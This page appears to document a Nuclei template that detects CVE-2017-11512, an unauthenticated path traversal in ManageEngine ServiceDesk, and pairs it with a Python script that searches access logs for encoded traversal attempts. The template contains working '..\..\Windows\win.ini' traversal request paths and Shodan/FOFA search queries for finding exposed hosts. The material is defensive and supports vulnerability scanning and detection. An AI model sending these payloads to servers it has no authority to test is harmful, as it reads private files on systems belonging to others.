ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval
ID: CVE-2017-11512
Severity: high
Author: 0x_Akoko
Tags: cve,cve2017,manageengine,lfr,unauth,tenable
Description
ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.
YAML Source
id: CVE-2017-11512

info:
  name: ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval
  author: 0x_Akoko
  severity: high
  description: |
    ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.
  impact: |
    An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage.
  remediation: |
    Upgrade to a patched version of ManageEngine ServiceDesk 9.3.9328 or apply the necessary security patches.
  reference:
    - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html
    - https://www.tenable.com/security/research/tra-2017-31
    - https://nvd.nist.gov/vuln/detail/CVE-2017-11512
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-11512
    cwe-id: CWE-22
    epss-score: 0.97175
    epss-percentile: 0.99794
    cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: manageengine
    product: servicedesk
    shodan-query:
      - http.title:"ManageEngine"
      - http.title:"manageengine"
    fofa-query: title="manageengine"
    google-query: intitle:"manageengine"
  tags: cve,cve2017,manageengine,lfr,unauth,tenable

http:
  - method: GET
    path:
      - '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini'
      - '{{BaseURL}}/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini'

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4a0a0047304502204a94044ff73276007dfd425b58c7b1f446627eb1baf2eafc924c0ca182bd0c32022100c9a1c4d04178af53f558be3e211fed6b4b40b171ef50bb05336a0b7e4c3888f0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-11512.yaml"
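
For reviewing server logs rather than scanning, the following added example (not part of the template or of Nuclei) flags requests to the two endpoints the template uses whose file-name parameter contains a ".." path segment, including percent-encoded and double-encoded forms. The combined access-log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint -> file-name parameter, both taken from the template's two requests.
WATCHED = {
    "/fosagent/repl/download-file": "filepath",
    "/fosagent/repl/download-snapshot": "name",
}
# Request line and status of a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A ".." path segment bounded by "/" or "\" (or the start/end of the value).
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')

# Constructed sample log lines (addresses, times and file names are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /fosagent/repl/download-snapshot?name=..%5C..%5C..%5CWindows%5Cwin.ini HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /fosagent/repl/download-file?basedir=4&filepath=..%252f..%252fconf%252fx.txt HTTP/1.1" 404 0',
    '198.51.100.7 - - [01/Jan/2024:10:05:00 +0000] "GET /fosagent/repl/download-snapshot?name=snapshot_01.zip HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2024:10:06:00 +0000] "GET /index.html?name=../x HTTP/1.1" 200 100',
]


def fully_unquote(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252f) up to `rounds` times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_traversal_requests(log_lines):
    """Return (line_no, endpoint, decoded_value, status) for each suspicious request."""
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target, status = match.group(1), int(match.group(2))
        url = urlsplit(target)
        param = WATCHED.get(url.path.rstrip("/").lower())
        if param is None:
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get(param, []):
            value = fully_unquote(raw)
            if TRAVERSAL_RE.search(value):
                hits.append((line_no, url.path, value, status))
    return hits
```

A hit with status 200 deserves priority in triage, since it indicates the server answered the request rather than rejecting it.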